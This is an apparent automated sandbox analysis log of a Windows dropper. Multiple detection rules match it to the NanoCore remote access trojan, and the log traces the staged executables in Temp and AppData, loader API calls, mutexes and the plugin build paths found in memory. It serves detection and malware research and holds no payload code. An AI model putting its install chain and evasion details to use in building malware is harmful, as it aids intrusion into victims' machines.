      Source: 00000002.00000002.571597397.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.571864347.0000000007610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.570873526.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00406D5F0_2_00406D5F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028E63C1_2_0028E63C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028DA0F1_2_0028DA0F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028D4BE1_2_0028D4BE
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028DF601_2_0028DF60
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_0028F3741_2_0028F374
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F0F9C1_2_005F0F9C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 1_2_005F122C1_2_005F122C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028E63C2_2_0028E63C
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028DA0F2_2_0028DA0F
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028D4BE2_2_0028D4BE
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028DF602_2_0028DF60
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0028F3742_2_0028F374
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040CBD12_2_0040CBD1
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076714002_2_07671400
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076633242_2_07663324
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076642EB2_2_076642EB
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_076646D32_2_076646D3
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0319E4702_2_0319E470
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0319E4802_2_0319E480
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0319BBD42_2_0319BBD4
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: String function: 00286EDB appears 34 times
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: String function: 00401EE0 appears 33 times
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: String function: 00283D50 appears 58 times
      Source: PhviZrlpkW.exeReversingLabs: Detection: 57%
      Source: PhviZrlpkW.exeVirustotal: Detection: 52%
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile read: C:\Users\user\Desktop\PhviZrlpkW.exeJump to behavior
      Source: PhviZrlpkW.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\PhviZrlpkW.exe C:\Users\user\Desktop\PhviZrlpkW.exe
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 632
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.moJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeProcess created: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile created: C:\Users\user\AppData\Roaming\ovawcpafrwkJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile created: C:\Users\user\AppData\Local\Temp\nsu83B2.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@9/17@17/1
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\PhviZrlpkW.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{fc2f5233-89c0-4cab-99aa-8d389dd5dffd}
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5104
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2468
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCode function: 2_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_0040147B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: GetTickCount1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Sleep1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: VirtualAlloc1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad1_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: GetTickCount2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Sleep2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: VirtualAlloc2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Kernel32.dll2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad2_2_002828A0
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeCommand line argument: Notepad2_2_002828A0
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: PhviZrlpkW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\xampp\htdocs\2efa81c4e6b34188a21ceb28fac598e4\Loader\Release\Loader.pdb source: PhviZrlpkW.exe, 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp, PhviZrlpkW.exe, 00000000.00000002.314365455.0000000002859000.00000004.00000020.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000001.00000000.299162939.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000002.00000000.302278058.0000000000290000.00000002.00000001.01000000.00000004.sdmp, edpm.exe, 00000003.00000002.364296668.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000003.00000000.330467592.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000000.351397609.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000002.364278841.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe.1.dr, tchnhwrvi.exe.0.dr, nse83F1.tmp.0.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
